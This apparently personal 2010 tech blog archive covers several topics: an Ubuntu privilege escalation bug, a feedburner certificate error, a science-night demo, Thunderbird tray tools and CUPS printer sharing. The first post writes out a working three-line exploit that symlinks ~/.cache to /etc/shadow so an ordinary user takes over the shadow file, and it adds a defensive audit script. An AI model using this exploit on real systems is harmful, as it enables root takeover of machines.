binfalse
uuurrgh... Ubuntu
July 9th, 2010
Ubuntu, as you all should know, isn’t my preferred operating system. It’s very nice for Linux beginners and may save some manual work on private machines, but now that I’ve heard about the current bug I’m very confused about why we still have to use Ubuntu in our PC pools, why some work groups are so emphatic about this system, and why we have to administer their server and local machines with Ubuntu.
I’m still wondering why ordinary users on Ubuntu systems can, out of the box, read all log files or the shadow.. That is not the kind of security I’m dreaming about ;)
The current bug is very simple (via):
rm -rf ~/.cache
ln -s /etc/shadow ~/.cache
ssh localhost
Now you own the shadow file and are able to modify root’s passphrase! It’s just too easy…
By the way, I tried it myself and got a funny message:
mscharm@SERVER ~ % ssh localhost
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
aa:bb:cc:dd:ee:ff:gg:hh:ii:jj:kk:ll:mm:nn:oo:pp.
Please contact your system administrator.
Add correct host key in /homes/mscharm/.ssh/known_hosts to get rid of this message.
Offending key in /homes/mscharm/.ssh/known_hosts:10
RSA host key for localhost has changed and you have requested strict checking.
Host key verification failed.
255 mscharm@SERVER ~ %
And my friend Rumpel also tried this exploit and after lunch I just heard him saying
fuck, bolted out, by my self...
not able to disable his screensaver. Maybe he changed a little bit too much in his shadow file!? ;)
Fortunately the patch is released, so have a lot of fun while updating your systems. You should reboot after the update, otherwise the bug is still enabled…
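An added defensive check for the symlink trick above (not part of the original post): it lists home directories whose .cache is a symbolic link and verifies that a sensitive file is still owned by root. The function names and the /home default are assumptions made for this illustration; the system shown above keeps its homes under /homes.

```shell
#!/bin/sh
# Added example: audit for ~/.cache symlinks and for a changed owner
# on the file such a link would point at. All names are hypothetical.

# Print "HOME -> TARGET" for every home directory under $1 whose .cache
# is a symbolic link. A regular .cache directory is what we expect.
find_cache_symlinks() {
    base=$1
    for home in "$base"/*/; do
        home=${home%/}
        cache="$home/.cache"
        if [ -L "$cache" ]; then
            printf '%s -> %s\n' "$home" "$(readlink "$cache")"
        fi
    done
}

# Return 0 if file $1 is owned by numeric uid $2, 1 otherwise.
# "ls -ldn" is used instead of stat(1) because its format is portable.
owned_by_uid() {
    uid=$(ls -ldn -- "$1" | awk '{print $3}')
    [ "$uid" = "$2" ]
}

# Full audit: $1 = directory containing the homes, $2 = file to protect.
# Returns 1 if a symlinked .cache exists or $2 is not owned by uid 0.
audit() {
    base=$1; target=$2; rc=0
    hits=$(find_cache_symlinks "$base")
    if [ -n "$hits" ]; then
        printf 'suspicious .cache symlinks:\n%s\n' "$hits"
        rc=1
    fi
    if ! owned_by_uid "$target" 0; then
        printf '%s is not owned by root\n' "$target"
        rc=1
    fi
    return $rc
}

# Touch the live system only when called as: sh audit.sh run [HOMES_DIR]
if [ "${1:-}" = "run" ]; then
    audit "${2:-/home}" /etc/shadow
fi
```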
Google does not like self-signed SSL certs
July 8th, 2010
The last few days my feeds were out of date. I manage them with Google’s solution called feedburner, you may have noticed it.
It seems that the developers of this project changed some stuff, anyway, they did not update my feeds. The last days (or weeks) I did not have the time to take care of it, but today I found a few minutes.
When I tried to resync my feeds manually I got this nice red error (see also the picture):
There is an issue that must be addressed with your source feed for the feed "binfalse" sun.security.validator.ValidatorException: PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target
This is caused by my Apache redirect directive that redirects all visitors looking for an insecure URL at port 80 to my SSL encrypted content at port 443:
<VirtualHost *:80>
...
Redirect / /
...
</VirtualHost>
So you see I’m caring about security ;)
This method worked for a long time, but now feedburner tries to verify the certs, and because of a lack of money I signed my certs myself. So feedburner denies the access and doesn’t reread my own feeds to update its database. To repair this problem I’m just redirecting my real content and not the feeds, so feedburner is happy, and why should I care about the secure connection of feedburner to my site..
Nevertheless it is not my preferred solution.
Inactivity? Not in the slightest...
July 1st, 2010
Before anyone thinks I’m hibernating, I’ve just so much to do, so there is no time to maintain this blog… Just don’t know what to do first.
This week I had a presentation, topic was “Modeling of Overflow Metabolism in Batch and Fed-Batch Cultures of Escherichia coli”. I also had to submit a study, with the headline “Modeling and evaluation of the dynamic behavior of a fermentation by simulation”, that among others analyzes the dependencies of the ratio of product concentration versus biomass concentration on biological parameters. Additionally this week I finished a work for a friend at the Otto-von-Guericke-Universität Magdeburg. He has to evaluate x-rays taken at a new detector and I developed a tool that does the trick.
As if that were not time-consuming enough, I’m still working on my project work; next week I have to present it in a research seminar (fortunately in German).
The reason I’m writing this article: tomorrow is the so-called Lange Nacht der Wissenschaften (translated by Google: Long Night of Science). Here the different departments of the university present what they are doing, in a way that is comprehensible for the public. In this event we also have a slot dealing with SUN Spots where I’m presenting some cool stuff I’ve programmed. Planned are some introductions to what Spots are and what they can do, and of course some demos. Among others we are playing with the light sensor and visualize a sunrise and a sunset, and we demonstrate how one can regulate a fan depending on the temperature measured with a Spot (to induce a higher temperature a candle is planned, I hope everything will go well and the Spot won’t melt away!). Of course some basic demos are shown, like AirText or the BouncingDemo, and last but not least it is time to play. I have prepared a labyrinth that has to be solved by various people against each other (up to seven people at a time in the same labyrinth, just limited by the number of available Spots), and I also developed a control system for the game Blobby Volley to navigate the Blobbies with a Spot, maybe you’ve heard about it ;) We also wanted to build a little car to drive around a little bit, but I’m not such an engineer so this car isn’t finished…
If you are bored and don’t know what to do tomorrow, visit this presentation!! It’s at 8.30 am in room 3.31 at the Von-Seckendorff-Platz 1.
Maybe I’ll publish all the code when there is a little time to write some comments and how-tos.
So you see, I’m very busy at the moment. If anyone has nothing to do, just notify me, I’ll give you something to work on!
Thunderbird to systray
June 2nd, 2010
Until version 3 of Thunderbird, or more exactly icedove, I used the add-on New Mail Icon to free the space in the task list that the Thunderbird process occupies even though I very rarely have this window in the foreground. But it seems that there is no further development in this project, so this software isn’t compatible with the current major release…
On my main desktop I thought I’d have to live with that, but on my notebook screen there is a lack of space, more than ever, so I had to search for an alternative tool. On my way I found a tool (no add-on) called AllTray, it’s available in the Debian/Ubuntu repository. It can dock any window to your tray, so it doesn’t depend on Thunderbird, you can also dock a terminal or your editor or even a complete (Oracle VM) VirtualBox instance.
For my Thunderbird problem it’s only half of the solution, because this tool doesn’t tell me whether there are unread mails. But after some more research I found a real add-on called FireTray that does the desired trick. So more space for other junk ;-)
Serv local printer
May 29th, 2010
I have an old printer, an HP Laserjet 6P. It is very reliable and fast, so no need to buy a new one. But there is a problem (I thought), this printer has no network interface, it is connected via a parallel port to my host. A few minutes ago I was racking my brain over how to use this printer with my notebook. Now I’m amazed at how easy it is using cups!!
On the server side (the machine that is connected to the printer) you just have to modify this printer and check the field called “Share This Printer”, and in the administration tab just enable “Share printers connected to this system” and “Allow printing from the Internet”.
On your client you only have to publish your server. To do it for the complete system, write the following line to your /etc/cups/client.conf; to set this server only for your local user account, write it to your user’s $HOME/.cups/client.conf:
ServerName SERVER:PORT
You only have to specify the port if your server is not listening on the default port 631.
That’s it! Open a document and try to print! I still cannot believe that it is that easy ;)
Thanks to the cups-team